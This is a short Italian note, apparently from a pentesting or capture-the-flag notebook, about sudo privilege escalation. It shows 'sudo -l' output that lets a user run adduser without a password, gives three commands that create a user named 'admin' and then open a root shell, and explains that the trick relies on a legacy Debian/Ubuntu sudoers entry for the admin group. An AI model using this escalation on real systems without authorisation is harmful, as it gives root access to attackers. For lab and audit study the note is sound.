tags: privilage_escalation Adduser sudo Adduser_sudo
Quando il nostro utente possiede questi privilegi:
sudo -l
Matching Defaults entries for useradmin on manage:
env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User useradmin may run the following commands on manage:
(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$Abbiamo praticamente vinto se il file sudoers è mal configurato, perchè ci basta eseguire i seguenti comandi per diventare root:
#Crea l'utente, metti una password e balza tutti i dati di contesto utente
sudo /usr/sbin/adduser admin
#Autenticati come l'utente appena creato
su admin
#Avvia una shell di root
sudo bash
La creazione dell’utente “admin” consente di ottenere una shell di root a causa di una combinazione tra il comportamento predefinito del comando adduser e una configurazione legacy frequentemente mantenuta nel file /etc/sudoers dei sistemi basati su Debian e Ubuntu.